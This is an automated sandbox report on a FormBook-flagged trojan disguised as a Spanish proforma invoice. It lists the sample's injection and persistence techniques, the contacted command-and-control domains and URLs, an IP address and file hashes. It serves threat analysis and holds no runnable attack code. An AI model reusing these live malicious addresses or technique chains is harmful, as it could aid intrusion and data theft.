            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502357 Sample: Factura de proforma.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 36 www.new-post-vehicle-site.xyz 2->36 38 www.festival-du-chanvre.com 2->38 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Yara detected AntiVM3 2->50 52 8 other signatures 2->52 11 Factura de proforma.exe 10 2->11         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\...\tmpD689.tmp, XML 11->32 dropped 34 C:\Users\user\AppData\...\tskpCbAwtxoaw.exe, PE32 11->34 dropped 14 RegSvcs.exe 11->14         started        17 schtasks.exe 1 11->17         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 2 other signatures 14->68 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 40 parking3.dnstool.net 13.209.99.177, 49806, 80 AMAZON-02US United States 19->40 42 www.palmonlae.space 19->42 44 www.aminobalm.com 19->44 54 System process connects to network (likely due to code injection or exploit) 19->54 25 cscript.exe 19->25         started        signatures10 process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 25->56 58 Maps a DLL or memory area into another process 25->58 60 Tries to detect virtualization through RDTSC time measurements 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.jiyu-kobo.co.jp/XDiUa0%Avira URL Cloudsafe
            http://www.fonts.comc0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn2U%0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn.U0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/tDMU0%Avira URL Cloudsafe
            http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h0%Avira URL Cloudsafe
            http://www.sandoll.co.krN.TTFs0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.comF0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/a-eoDFU$0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.fonts.com-uT0%Avira URL Cloudsafe
            http://en.w0%URL Reputationsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ko0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/7D0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            www.thefanlounge.com/cb3b/0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/JD0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            parking3.dnstool.net
            13.209.99.177
            truetrue
              unknown
              www.festival-du-chanvre.com
              unknown
              unknowntrue
                unknown
                www.aminobalm.com
                unknown
                unknowntrue
                  unknown
                  www.palmonlae.space
                  unknown
                  unknowntrue
                    unknown
                    www.new-post-vehicle-site.xyz
                    unknown
                    unknowntrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9htrue
                      • Avira URL Cloud: safe
                      unknown
                      www.thefanlounge.com/cb3b/true
                      • Avira URL Cloud: safe
                      low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                        high
                        http://www.fontbureau.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/XDiUaFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/?Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                              high
                              http://www.fonts.comcFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/bTheFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn2U%Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn.UFactura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/tDMUFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designers?Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                high
                                http://www.sandoll.co.krN.TTFsFactura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.tiro.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designersFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comFFactura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.goodfont.co.krFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/a-eoDFU$Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/jp/Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fonts.com-uTFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://en.wFactura de proforma.exe, 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.collada.org/2005/11/COLLADASchema9DoneFactura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/koFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.comlFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sajatypeworks.comFactura de proforma.exe, 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/cTheFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comFactura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnFactura de proforma.exe, 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/tFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/7DFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designerskSHUFactura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fonts.comnFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comFactura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/JDFactura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zhongyicts.com.cnFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFactura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.sakkal.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxcscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              13.209.99.177
                                              parking3.dnstool.netUnited States
                                              16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:502357
                                              Start date:13.10.2021
                                              Start time:20:33:12
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 20s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Factura de proforma.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@10/4@4/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 13.8% (good quality ratio 12.5%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.9%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.221, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 52.251.79.25
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              20:34:22API Interceptor1x Sleep call for process: Factura de proforma.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AMAZON-02USOHqOvvjgbN.msiGet hashmaliciousBrowse
                                              • 52.95.165.3
                                              Gsdqz.dllGet hashmaliciousBrowse
                                              • 3.126.56.137
                                              OCT 13 2021 - PRINT COPY.xlsxGet hashmaliciousBrowse
                                              • 18.197.254.181
                                              HUTWMrDhov.dllGet hashmaliciousBrowse
                                              • 18.156.0.31
                                              M1YceQ237E.dllGet hashmaliciousBrowse
                                              • 18.184.201.8
                                              Sajeeb09908976745344567.xlsxGet hashmaliciousBrowse
                                              • 3.64.163.50
                                              2OfuyvjJu1.msiGet hashmaliciousBrowse
                                              • 52.95.163.44
                                              cvWFjfKtdHGet hashmaliciousBrowse
                                              • 54.103.213.234
                                              K3h3TPEpzeGet hashmaliciousBrowse
                                              • 34.219.214.170
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.106
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.106
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.51
                                              Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                              • 54.230.206.25
                                              Ref 0180066743.xlsxGet hashmaliciousBrowse
                                              • 13.232.45.220
                                              pago atrasado.exeGet hashmaliciousBrowse
                                              • 3.64.163.50
                                              6AYs2EgVeN.apkGet hashmaliciousBrowse
                                              • 52.222.174.50
                                              4f0PBbcOBIGet hashmaliciousBrowse
                                              • 34.249.145.219
                                              REQUIREMENT.exeGet hashmaliciousBrowse
                                              • 3.121.211.190
                                              RlypFfB7n8Get hashmaliciousBrowse
                                              • 54.171.230.55
                                              7iw4z5I41wGet hashmaliciousBrowse
                                              • 34.249.145.219

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura de proforma.exe.log
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1308
                                              Entropy (8bit):5.348115897127242
                                              Encrypted:false
                                              SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                              MD5:832D6A22CE7798D72609B9C21B4AF152
                                              SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                              SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                              SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
